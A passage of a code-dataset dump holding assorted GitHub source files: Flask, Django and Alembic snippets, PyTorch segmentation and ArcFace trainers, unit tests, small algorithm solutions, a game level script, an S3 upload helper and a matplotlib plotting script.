{end_color}'\n },\n {\n 'checks': [{'field': 'ilk', 'equals': 'other'}],\n 'template': '{color_for_other} {node_id} {end_color}'\n },\n {\n 'template': '{node_id}'\n }\n ]\n html_formatting_data = {\n 'color_for_usb': '',\n 'color_for_pci': '',\n 'color_for_other': '',\n 'color_purple': '',\n 'end_color': ''\n }\n\n labels = []\n for device_path in device_paths:\n device_data = device_classifier.get_device_data(device_path)\n template = device_classifier.get_template(device_path, rules)\n label = device_classifier.get_label(device_path, rules, html_formatting_data)\n augumented_label = f\"{device_data['dirname']} {label} - template: {template}\"\n labels.append(augumented_label)\n\n return flask.render_template(\n 'app/usb/device/nodepath/styled_index.html',\n device_id_list=[],\n alias_list=[],\n node_data_list=node_data_list,\n device_data_list=device_data_list,\n labels=labels)\n","repo_name":"rich-dobbs-13440/astutus","sub_path":"src/astutus/web/usb_pages.py","file_name":"usb_pages.py","file_ext":"py","file_size_in_byte":17931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"42579654609","text":"import copy\nimport csv\nimport os\nimport time\n\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nfrom torchvision.models.segmentation.deeplabv3 import DeepLabHead\nfrom torchvision import models\n\nclass DeepLabv3Model:\n def __init__(self, batch_size, device, n_classes, criterion, epochs, lr=1e-4):\n self.batch_size = batch_size\n self.device = device\n self.resnet_penultimate_layer_sizes=[512,512,2048,2048] #for 18,34,50,101\n self.n_classes = n_classes\n self.criterion=criterion\n self.epochs=epochs\n self.lr = lr\n \n self.model = self.build(out_channels = self.n_classes)\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n \n\n def build(self, out_channels=6):\n model = models.segmentation.deeplabv3_resnet50(pretrained=True,\n progress=True)\n model.classifier = DeepLabHead(2048, out_channels)\n model.train()\n model.to(self.device)\n return model\n \n\n def train(self, train_loader, test_loader, metrics, logdir):\n since = time.time()\n best_weights = copy.deepcopy(self.model.state_dict())\n best_loss = 1e10\n\n fieldnames = ['epoch', 'train_loss', 'test_loss'] + \\\n [f'train_{m}' for m in metrics.keys()] + \\\n [f'test_{m}' for m in metrics.keys()]\n\n with open(os.path.join(logdir, 'log.csv'), 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n for epoch in range(1, self.epochs + 1):\n print('Epoch {}/{}'.format(epoch, self.epochs))\n print('-' * 10)\n log = {a: [0] for a in fieldnames}\n log['epoch'] = epoch\n\n #TRAIN\n self.model.train()\n\n for imgs, masks in tqdm(train_loader):\n imgs = imgs.to(self.device)\n masks = masks.to(self.device)\n\n self.optimizer.zero_grad()\n\n with torch.set_grad_enabled(True):\n outputs = self.model(imgs)\n loss = self.criterion(outputs['out'], masks)\n y_pred = outputs['out'].data.cpu().numpy().ravel()\n y_true = masks.data.cpu().numpy().ravel()\n for name, metric in metrics.items():\n if name == 'f1_score':\n log[f'train_{name}'].append(\n metric(y_true > 0, y_pred > 0.1))\n else:\n log[f'train_{name}'].append(\n metric(y_true.astype('uint8'), y_pred))\n\n loss.backward()\n self.optimizer.step()\n\n train_loss = loss.item()\n\n #VALIDATION\n self.model.eval()\n\n for imgs,masks in tqdm(test_loader):\n imgs = imgs.to(self.device)\n masks = masks.to(self.device)\n\n with torch.set_grad_enabled(False):\n outputs = self.model(imgs)\n loss = self.criterion(outputs['out'], masks)\n y_pred = outputs['out'].data.cpu().numpy().ravel()\n y_true = masks.data.cpu().numpy().ravel()\n for name, metric in metrics.items():\n if name == 'f1_score':\n log[f'test_{name}'].append(\n metric(y_true > 0, y_pred > 0.1))\n else:\n log[f'test_{name}'].append(\n metric(y_true.astype('uint8'), y_pred))\n\n test_loss = loss.item()\n\n\n log[f'train_loss'] = train_loss\n log[f'test_loss'] = test_loss\n print('Train: {:.4f}'.format(train_loss))\n print('Test: {:.4f}'.format(test_loss)) \n\n for field in fieldnames[3:]:\n log[field] = np.mean(log[field])\n\n print(log)\n\n with open(os.path.join(logdir, 'log.csv'), 'a', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow(log)\n\n if test_loss < best_loss:\n best_loss = test_loss\n best_weights = copy.deepcopy(self.model.state_dict())\n \n torch.save(self.model, os.path.join(logdir, 'deeplabv3_model.pt'))\n torch.save(self.model.state_dict(), os.path.join(logdir, 'deeplabv3_weights.pt'))\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Lowest Loss: {:4f}'.format(best_loss))\n\n # load best model weights\n self.model.load_state_dict(best_weights)\n \n torch.save(self.model, os.path.join(logdir, 'deeplabv3_model.pt'))\n torch.save(self.model.state_dict(), os.path.join(logdir, 'deeplabv3_weights.pt'))\n","repo_name":"Andrewwango/vegetation-segmentation","sub_path":"vegetation-segmentation/deeplabv3/deeplabmodel.py","file_name":"deeplabmodel.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"376102213","text":"N = int(input())\ndef data(n):\n cnt = 0\n if n < 100: #100보다 작은 수 는 모두 한수\n return n\n else:\n for i in range(100,n+1): #100 이상의 수는 문자열로 만들고 리스트로 만들고 다시 숫자로 만든다\n lst = list(map(int,str(i))) \n a= lst[0]-lst[1] # 첫번째와 두번째 수의 차\n for j in range(1,len(lst)-1): #두번째와 세번째의 차 부터 검사해서 a와 같지 않다면 break\n if lst[j]-lst[j+1] != a:\n break\n else: # break 없이 끝났다면 한수 이므로 카운트증가\n cnt+=1\n return cnt+ 99 # 100 미만 한수 개수 + 100이상 한수 개수\nprint(data(N))\n","repo_name":"DailyStudy08/ajin_baekjoon","sub_path":"1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"800804711","text":"from django.db import models\n\nNULLABLE = {'null': True, 'blank': True}\n\n\nclass Autoparts(models.Model):\n manufacturer = models.CharField(max_length=150, verbose_name='Производитель')\n art = models.CharField(max_length=150, verbose_name='Артикул')\n description = models.TextField(verbose_name='Описание')\n qty = models.IntegerField(verbose_name='Количество')\n price = models.DecimalField(**NULLABLE, max_digits=19, decimal_places=2, verbose_name='Цена')\n # price = models.CharField(max_length=150, **NULLABLE, verbose_name='Цена')\n storage_location = models.CharField(**NULLABLE, max_length=100, verbose_name='Место хранения', default='нет данных')\n ref_storage = models.CharField(**NULLABLE, max_length=100, verbose_name='Изменённое место хранения')\n delivery_date = models.DateField(**NULLABLE, verbose_name='Дата доставки', default='нет данных')\n supplier = models.TextField(**NULLABLE, verbose_name='Поставщик', default='нет данных')\n product_is_accepted = models.BooleanField(default=False)\n photo = models.ImageField(**NULLABLE, upload_to='blog/', verbose_name='Изображение')\n\n # warehouse = models.CharField(**NULLABLE, max_length=200, verbose_name='Склад хранения')\n\n def __str__(self):\n return f'{self.pk} Производитель: {self.manufacturer} {self.art}'\n\n class Meta:\n ordering = ['product_is_accepted', '-art']\n verbose_name = 'Деталь'\n verbose_name_plural = 'Детали'\n","repo_name":"illustratorOut/333333","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"40544820250","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom api.views import ProductViewSet, OrderApi\n\napp_name = 'api'\n\nrouter = DefaultRouter()\nrouter.register(r'product', ProductViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('order//', OrderApi.as_view(), name='order_api'),\n]\n","repo_name":"violettalivada/hw_48","sub_path":"source/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"9001245584","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom student_dash import views\n\nurlpatterns = [\n path('stats/',views.dash, name='statistics'),\n path('',views.infoscreen, name='dashboard'),\n path('allstats/',views.staff_info, name='allstats'),\n path('signup/', views.signup, name='signup'),\n path('reports/',views.report, name='reports'),\n path('finance/',views.finance,name='finance'),\n path('nav/',views.nav,name='nav'),\n path('accounts/', include('django.contrib.auth.urls')),\n\n]","repo_name":"Keletsomaleka/PHC_Reporting","sub_path":"school_too/student_dash/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"40029028981","text":"# This file contains the definition of the class UserDetails\n\n# imports to calculate distances of users from a reference point\nfrom math import sin, cos, radians, acos\n\nEARTH_RADIUS = 6371.0 # kilometers\n\n# class for a User, will contain all information pertaining to a user\nclass UserDetails(object):\n def __init__(self, _name, _user_id, _latitude, _longitude):\n '''\n stores members : user name, user id, latitude in radians and longitude in radians.\n The class will be used to store user details in its members and \n will have ability to calculate a users distance from a certain point on the earth.\n An object of this class can be constructed from a Json block containing the required member information\n '''\n \n self.name = _name\n self.user_id = _user_id\n self.radian_latitude = radians(_latitude)\n self.radian_longitude = radians(_longitude)\n \n def print(self):\n print(self.name)\n print(self.user_id)\n print(self.radian_latitude)\n print(self.radian_longitude)\n\n def get_distance_from_pt(self, reference_latitude, reference_longitude):\n '''\n Member function to calculate the user's distance from a reference point on the earth\n Input args: \n 1. reference point latitude in degrees, Type : float (+ve or -ve)\n 2. reference point longitude in degrees, Type : float (+ve or -ve)\n Return value:\n distance from reference point in kilometers, Type: +ve float number\n '''\n radian_reference_latitude = radians(reference_latitude)\n radian_reference_longitude = radians(reference_longitude)\n \n # using first formula from Wikipedia page to calculate distance\n # https://en.wikipedia.org/wiki/Great-circle_distance\n\n longitude_delta = self.radian_longitude - radian_reference_longitude\n central_angle = acos( \n sin(self.radian_latitude) * sin(radian_reference_latitude) \n + cos(self.radian_latitude) * cos(radian_reference_latitude) * cos(longitude_delta)\n )\n\n distance_from_reference = EARTH_RADIUS * central_angle\n return distance_from_reference\n \n @classmethod\n def from_json(self, json_dict):\n '''\n Method to contruct a UserDetails object from a json encoded line\n input args: 1. json encoded line containing relevant user details\n '''\n if all (keys in json_dict for keys in ('name', 'user_id', 'latitude', 'longitude')):\n return UserDetails(json_dict['name'], json_dict['user_id'], float(json_dict['latitude']), float(json_dict['longitude']))","repo_name":"punkiller/craic-party-invitation","sub_path":"user_details.py","file_name":"user_details.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"2216546334","text":"\"\"\"Corre los tests\"\"\"\n\nimport metnum\nimport unittest\n\nimport numpy as np\nimport scipy\n\nclass TestKNNClassifier(unittest.TestCase):\n def test_same(self):\n \"\"\"Testea que predecir la matriz de entrenamiento de el mismo res\"\"\"\n classifier = metnum.KNNClassifier(1, \"uniform\")\n\n X_train = np.array([\n [1, 2, 3],\n [6, 6, 6],\n [0, 1, 0],\n ])\n\n y_train = np.array([\n [0],\n [2],\n [3],\n ])\n\n classifier.fit(X_train, y_train)\n \n y = classifier.predict(X_train)\n\n self.assertTrue(np.allclose(y.reshape(3, 1), y_train))\n \n def test_little(self):\n \"\"\"Testea un caso en R2\"\"\"\n classifier = metnum.KNNClassifier(3, \"uniform\")\n\n X_train = np.array([\n [0, 0], [1, 0], [0, 1], [1, 1],\n [5, 5], [6, 5], [5, 6], [6, 6],\n [20, 20], [21, 20], [20, 22], [22, 20],\n ])\n\n y_train = np.array([\n [0], [0], [0], [0],\n [5], [5], [5], [5],\n [9], [9], [9], [9],\n ])\n\n classifier.fit(X_train, y_train)\n\n X = np.array([\n [15, 15], # 9\n [10, 10], # 5\n [2, 2], # 0\n ])\n\n want = np.array([9.0, 5.0, 0.0])\n got = classifier.predict(X)\n\n assertAllClose(self, want, got)\n\n\n def test_weights(self):\n \"\"\"Testea los weights\"\"\"\n\n # Primero, caso en el que considere todos los vecinos, y en caso\n # de empate deberia dar el primero.\n classifier = metnum.KNNClassifier(12, \"uniform\")\n\n X_train = np.array([\n [20, 20], [21, 20], [20, 22], [22, 20],\n [0, 0], [1, 0], [0, 1], [1, 1],\n [5, 5], [6, 5], [5, 6], [6, 6],\n ])\n\n y_train = np.array([\n [9], [9], [9], [9],\n [0], [0], [0], [0],\n [5], [5], [5], [5],\n ])\n\n classifier.fit(X_train, y_train)\n\n X = np.array([\n [15, 15], # deberia dar 9\n ])\n\n got = classifier.predict(X)\n assertAllClose(self, np.array([0.0]), got)\n\n # prediciendo tomando como weights la distancia,\n # deberia dar el valor correcto\n classifier = metnum.KNNClassifier(12, \"distance\")\n classifier.fit(X_train, y_train)\n\n got = classifier.predict(X)\n assertAllClose(self, np.array([9.0]), got)\n\nclass TestPowerIteration(unittest.TestCase):\n def assertEigenpair(self, X, a, v):\n assertAllClose(self, np.abs(X @ v), np.abs(a * v))\n\n def test_diagonal(self):\n X = np.diag([3, -10, 2])\n a, v = metnum.power_iteration(X)\n v = v.reshape(3, 1)\n self.assertEigenpair(X, a, v)\n\n def test_single_item(self):\n X = np.array([20])\n a, v = metnum.power_iteration(X)\n self.assertEigenpair(X, a, v)\n\ndef assertAllClose(self, want, got):\n \"\"\"Se fija que dos vectores esten np.allclose\"\"\"\n self.assertTrue(np.allclose(want, got), f\"want: {want}, but got: {got}\")\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"mnPanic/metnum-tp2","sub_path":"notebooks/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"24435419175","text":"def main():\n filename = \"rosalind_tree.txt\"\n\n with open(filename) as f:\n n = int(f.readline().strip())\n edges = [tuple(map(int, line.strip().split())) for line in f.readlines()]\n\n print(n - len(edges) - 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alex-stephens/rosalind","sub_path":"rosalind_tree.py","file_name":"rosalind_tree.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"26149505920","text":"import numpy as np\nimport pytorch_lightning as pl\nimport torch\nfrom sklearn.preprocessing import LabelEncoder\nfrom torch.utils.data import DataLoader, RandomSampler\n\nimport pandas as pd\nimport torch.nn.functional as F\nfrom google_landmarks2.gld_data import GldData\nfrom google_landmarks2.model import EffB0Arc\nfrom google_landmarks2.preproc import train_aug, valid_aug\nfrom torch.utils.data.sampler import Sampler\n\nSEED = 2334\ntorch.manual_seed(SEED)\nnp.random.seed(SEED)\n\ndevice = 0\n\n\nclass EffB0ArcLightning(pl.LightningModule):\n\n def __init__(self):\n super(EffB0ArcLightning, self).__init__()\n self.model = EffB0Arc(device=device, n_class=81313)\n self.model.to(device)\n\n def forward(self, x, y):\n pred, vec = self.model(x, y)\n return pred\n\n def training_step(self, train_batch, batch_idx):\n x, y = train_batch\n x = x.to(device)\n y = y.to(device)\n logits = self.forward(x, y)\n\n with torch.no_grad():\n _, predicted = torch.max(logits.data, 1)\n acc = (predicted == y).sum().item() / x.shape[0]\n\n loss = F.cross_entropy(logits, y)\n\n logs = {'train_loss': loss, 'train_acc': acc}\n\n return {'loss': loss, 'log': logs, 'acc': acc}\n\n def validation_step(self, val_batch, batch_idx):\n x, y = val_batch\n x = x.to(device)\n y = y.to(device)\n logits = self.forward(x, y)\n\n with torch.no_grad():\n _, predicted = torch.max(logits.data, 1)\n acc = (predicted == y).sum().item() / x.shape[0]\n\n loss = F.cross_entropy(logits, y)\n\n return {'val_loss': loss, 'val_acc': acc}\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n avg_acc = np.stack([x['val_acc'] for x in outputs]).mean()\n tensorboard_logs = {'val_loss': avg_loss, 'val_acc': avg_acc}\n return {'avg_val_loss': avg_loss, 'log': tensorboard_logs}\n\n def prepare_data(self):\n df = pd.read_csv('/home/lyan/Documents/kaggle/kaggle_landmarks/train_group_folds.csv')\n le = LabelEncoder()\n le.fit_transform(df.landmark_id)\n fold = 0\n train = df[df.fold != fold]\n valid = df[df.fold == fold]\n\n self.train_data = GldData(df=train, aug=train_aug, label_encoder=le)\n self.valid_data = GldData(df=valid, aug=valid_aug, label_encoder=le)\n\n def train_dataloader(self):\n iter_size = 32 * 4000\n sampler = torch.utils.data.sampler.RandomSampler(range(iter_size))\n bs = torch.utils.data.sampler.BatchSampler(sampler, batch_size=32, drop_last=False)\n\n return torch.utils.data.DataLoader(self.train_data,\n num_workers=6,\n batch_sampler=bs)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.valid_data, num_workers=6, batch_size=32, shuffle=False)\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n return optimizer\n\n\nif __name__ == '__main__':\n model = EffB0ArcLightning()\n trainer = pl.Trainer()\n\n trainer.fit(model)\n","repo_name":"dodler/kgl","sub_path":"google_landmarks2/arcface_start.py","file_name":"arcface_start.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"}
+{"seq_id":"12844647643","text":"import os\nimport time\nimport boto3\n\ndef upload_files_to_s3(event, context):\n s3_client = boto3.client('s3')\n folder_path = 'C:/CSCI5410/A3/t'\n\n for filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename)\n if os.path.isfile(file_path):\n time.sleep(0.1) # Delay of 100 milliseconds\n\n try:\n s3_client.upload_file(file_path, 'sampledata-b00932103', filename)\n print(f\"Uploaded {filename} to S3 bucket\")\n except Exception as e:\n print(f\"Failed to upload {filename}: {str(e)}\")\n\n return 'Upload completed'\n\nupload_files_to_s3(None, None)\n","repo_name":"mudraverma65/EntityExtractor-LambdaAWS","sub_path":"upload_files_to_s3.py","file_name":"upload_files_to_s3.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"24268929690","text":"\"\"\"Added unique values for City.name model\n\nRevision ID: c740ee99497a\nRevises: d40f260fed81\nCreate Date: 2023-06-11 21:13:27.979442\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c740ee99497a'\ndown_revision = 'd40f260fed81'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'city', ['name'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'city', type_='unique')\n # ### end Alembic commands ###\n","repo_name":"berezzin/Weather-collector","sub_path":"migrations/versions/c740ee99497a_added_unique_values_for_city_name_model.py","file_name":"c740ee99497a_added_unique_values_for_city_name_model.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"21134326496","text":"# commands.py\n\ndef todo_list(lists):\n '''引数としてlistを受け取ったときの処理\n '''\n print('# Todo')\n for task in lists:\n if task['done'] == False:\n print(task['body'])\n \n print('\\n# Done')\n for task in lists:\n if task['done'] == True:\n print(task['body'])\n \ndef todo_add(lists, task_name):\n lists.append({'body': task_name, 'done': False})\n\n\ndef todo_done(lists, task_name):\n # タスクがないときは例外処理\n for task in lists:\n if task_name in task['body']:\n task['done'] = True\n\n\ndef todo_clear(lists):\n chg_lists = lists\n rmv = []\n for task in lists:\n if task['done'] == True:\n rmv.append(task)\n for task in rmv:\n lists.remove(task)\n \n","repo_name":"Kentoooooooo/Growth-record","sub_path":"ToDoList/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"33295474784","text":"# Classic diagonal line of stay bricks\n\nSetMapName(\"The magic ball - by JCD\")\n\n# Add a number of bricks\nfor x in range(0,4,1):\n for y in range(0,10,1):\n AddBrick(\"brick\", 300 - 24 + x * 75, 120 - 8 + y*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\nfor y in range(3,7,1):\n AddBrick(\"brick\", 300 - 24 + -1 * 75, 120 - 8 + y*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\nfor y in range(3,7,1):\n AddBrick(\"brick\", 300 - 24 + 4 * 75, 120 - 8 + y*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\ndef this_map_brick_hit(x,y):\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n AddBrick(\"brick\",x,y,\"basic_brick_hit()\",\"graphics/bricks/green2_75.png\")\n\ndef this_map_brick_hit2(x,y):\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n AddBrick(\"brick\",x,y,\"this_map_brick_hit(10,500)\",\"graphics/bricks/green2_75.png\")\n\ndef this_map_brick_hit3(x,y):\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n AddBrick(\"brick\",x,y,\"this_map_brick_hit(800-75-10,500)\",\"graphics/bricks/green2_75.png\")\n\ndef this_map_brick_hit4():\n # call basic_brick_hit\n basic_brick_hit()\n # look up the new brick to display\n for x in range(0,800,80):\n AddBrick(\"brick\",x,400,\"basic_brick_hit()\",\"graphics/bricks/blue2_75.png\")\n AddBrick(\"brick\",x,430,\"basic_brick_hit()\",\"graphics/bricks/yellow_stay_75.png\")\n\nAddBrick(\"brick\", 300 - 24 + 1 * 75, 120 - 8 + 10*25,\n \"this_map_brick_hit3(10,10),this_map_brick_hit(10,50)\",\n \"graphics/bricks/red2_75.png\")\n\nAddBrick(\"brick\", 300 - 24 + 2 * 75, 120 - 8 + 10*25,\n \"this_map_brick_hit2(800-75-10,10),this_map_brick_hit(800-75-10,50)\",\n \"graphics/bricks/red2_75.png\")\n\n\nAddBrick(\"brick\", 300 - 24 + 1 * 75, 120 - 8 + -1*25,\n \"this_map_brick_hit4()\",\n \"graphics/bricks/red2_75.png\")\n\n\nAddBrick(\"brick\", 300 - 24 + 2 * 75, 120 - 8 + -1*25,\n \"basic_brick_hit()\",\n \"graphics/bricks/red2_75.png\")\n\n\n#for t in range(0,360,30):\n# x = cos(t * factor) \n# y = sin(t * factor)\n# AddBrick(\"brick\", 400 - 24 + x*100, 220 - 8 + y*100,\n# \"basic_brick_hit()\",\n# \"graphics/bricks/green2_75.png\")\n\n\n# Add the walls\nStandardPlayField()\n\n# Add a paddle\nSetPaddle(366, 530, \"graphics/paddles/square2_75.png\")\n\n# define a round start function\ndef RoundStart():\n AddBallDefaultAtPos(10,100,\"graphics/balls/red.png\")\n\n# And, call it - probably will go\nRoundStart();\n","repo_name":"madsdyd/yanoid","sub_path":"data/maps/map8.py","file_name":"map8.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"71480220139","text":"#!/usr/bin/env python\n\"\"\"\nPlots 1-D CCFs of multiple energy channels together on one plot.\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\nfrom astropy.table import Table\nimport subprocess\nimport matplotlib.font_manager as font_manager\nfrom matplotlib.ticker import MultipleLocator\n\n__author__ = \"Abigail Stevens \"\n__year__ = \"2014-2017\"\n\n\n################################################################################\ndef type_positive_int(num):\n \"\"\"\n Check if an input is a positive integer, as an argparse type.\n\n Parameters\n ----------\n num : int, long, float, or double\n The number in question.\n\n Returns\n -------\n n : int\n The input number, if it's a positive integer\n\n Raises\n ------\n ArgumentTypeError if n isn't a real number or a positive integer.\n\n \"\"\"\n try:\n n = int(num)\n except ValueError or TypeError:\n message = \"Input is not a positive integer.\"\n raise argparse.ArgumentTypeError(message)\n\n if n >= 0:\n return n\n else:\n message = \"%d is not a positive integer.\" % n\n raise argparse.ArgumentTypeError(message)\n\n\n################################################################################\ndef main(ccf_file, plot_file, prefix, t_len=30):\n \"\"\"\n Main method of plot_multi.py. Plots 1-D CCFs of multiple energy channels\n together on one plot.\n\n Parameters\n ----------\n ccf_file : str\n plot_file : str\n prefix : str\n t_len : int\n\n Returns\n -------\n nothing\n\t\n \"\"\"\n\t\n try:\n in_table = Table.read(ccf_file)\n except IOError:\n print(\"\\tERROR: File does not exist: %s\" % ccf_file)\n exit()\n\n ccf = in_table['CCF']\n error = in_table['ERROR']\n n_bins = in_table.meta['N_BINS']\n # dt = in_table.meta['DT']\n\n time_bins = np.arange(n_bins)\n pos_time_bins = time_bins[0:n_bins/2]\n neg_time_bins = time_bins[n_bins/2:] - n_bins\n time_bins = np.append(neg_time_bins, pos_time_bins)\n\n ccf_3 = ccf[:, 3]\n err_3 = error[:, 3]\n pos_t_ccf_3 = ccf_3[0:n_bins/2]\n neg_t_ccf_3 = ccf_3[n_bins/2:]\n ccf_3 = np.append(neg_t_ccf_3, pos_t_ccf_3)\n pos_t_err_3 = err_3[0:n_bins/2]\n neg_t_err_3 = err_3[n_bins/2:]\n err_3 = np.append(neg_t_err_3, pos_t_err_3)\n\n ccf_9 = ccf[:, 9]\n err_9 = error[:, 9]\n pos_t_ccf_9 = ccf_9[0:n_bins/2]\n neg_t_ccf_9 = ccf_9[n_bins/2:]\n ccf_9 = np.append(neg_t_ccf_9, pos_t_ccf_9)\n pos_t_err_9 = err_9[0:n_bins/2]\n neg_t_err_9 = err_9[n_bins/2:]\n err_9 = np.append(neg_t_err_9, pos_t_err_9)\n\n ccf_15 = ccf[:, 15]\n err_15 = error[:, 15]\n pos_t_ccf_15 = ccf_15[0:n_bins/2]\n neg_t_ccf_15 = ccf_15[n_bins/2:]\n ccf_15 = np.append(neg_t_ccf_15, pos_t_ccf_15)\n pos_t_err_15 = err_15[0:n_bins/2]\n neg_t_err_15 = err_15[n_bins/2:]\n err_15 = np.append(neg_t_err_15, pos_t_err_15)\n\n ccf_24 = ccf[:, 24]\n err_24 = error[:, 24]\n pos_t_ccf_24 = ccf_24[0:n_bins/2]\n neg_t_ccf_24 = ccf_24[n_bins/2:]\n ccf_24 = np.append(neg_t_ccf_24, pos_t_ccf_24)\n pos_t_err_24 = err_24[0:n_bins/2]\n neg_t_err_24 = err_24[n_bins/2:]\n err_24 = np.append(neg_t_err_24, pos_t_err_24)\n\t\n #############\n\t## Plotting!\n\t#############\n\t\n font_prop = font_manager.FontProperties(size=20)\n fig, ax = plt.subplots(1, 1, figsize=(10, 6), tight_layout=True, dpi=300)\n\n ax.vlines(0.0, -20, 25.0, linestyle='dotted', color='black', lw=1.5)\n ax.hlines(0.0, -100, 100, linestyle='dashed', color='black', lw=1.5)\n ax.errorbar(time_bins, ccf_3, yerr=err_3, linewidth=2, color='orange',\n elinewidth=2, capsize=2, label=\"3.5 keV\")\n ax.errorbar(time_bins, ccf_9, yerr=err_9, linewidth=2, elinewidth=2,\n capsize=2, label=\"6 keV\")\n ax.errorbar(time_bins, ccf_15, yerr=err_15, linewidth=2, elinewidth=2,\n capsize=2, label=\"10.5 keV\")\n ax.errorbar(time_bins, ccf_24, yerr=err_24, linewidth=2, elinewidth=2,\n capsize=2, label=\"18 keV\")\n\n # ax.set_xlabel(r'Time-delay ($\\times\\,$8.15$\\,$ms)',\n # fontproperties=font_prop)\n delay = in_table.meta['DT'] * 1000\n ax.set_xlabel(r'Time-delay ($\\times\\,$%.2f$\\,$ms)' % delay,\n fontproperties=font_prop)\n ax.set_ylabel('Deviation from mean (cts$\\;$s$^{-1}$)', \\\n \tfontproperties=font_prop)\n ax.set_xlim(-t_len, t_len)\n ax.set_ylim(-10, 15)\n # ax.set_ylim(-1, 1)\n\n ## Setting the axes' minor ticks. It's complicated.\n x_maj_loc = ax.get_xticks()\n # x_maj_loc = [0, 50, 100]\n # ax.set_xticks(x_maj_loc)\n y_maj_loc = ax.get_yticks()\n\n x_min_mult = 0.25 * (x_maj_loc[1] - x_maj_loc[0])\n y_min_mult = 1.0\n xLocator = MultipleLocator(x_min_mult) ## loc of minor ticks on x-axis\n yLocator = MultipleLocator(y_min_mult) ## loc of minor ticks on y-axis\n ax.xaxis.set_minor_locator(xLocator)\n ax.yaxis.set_minor_locator(yLocator)\n\n ax.tick_params(axis='x', labelsize=20)\n ax.tick_params(axis='y', labelsize=20)\n ax.tick_params(which='major', width=1.5, length=7)\n ax.tick_params(which='minor', width=1.5, length=4)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(1.5)\n ax.set_title(\"%s, CCF per energy channel\" % prefix,\n fontproperties=font_prop)\n\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles, labels, loc='upper right', fontsize=18,\n borderpad=0.5, labelspacing=0.5, borderaxespad=0.5)\n\t\n plt.savefig(plot_file)\n # plt.show()\n plt.close()\n # subprocess.call(['cp', plot_file, \\\n # \"/Users/abigailstevens/Dropbox/Research/CCF_paper1/\"])\n\n\n################################################################################\nif __name__ == \"__main__\":\n\t\n parser = argparse.ArgumentParser(usage=\"python plot_multiccfs.py ccf_table\"\\\n \" plot_file [-p prefix]\", description=\"Plots CCFs of multiple \"\\\n \"energy channels on one plot.\")\n\t\n parser.add_argument('ccf_table', help=\"Name of file with CCF amplitudes in\"\\\n \"a table.\")\n\t\n parser.add_argument('plot_file', help=\"The output file name for the plot.\")\n\t\n parser.add_argument('-p', 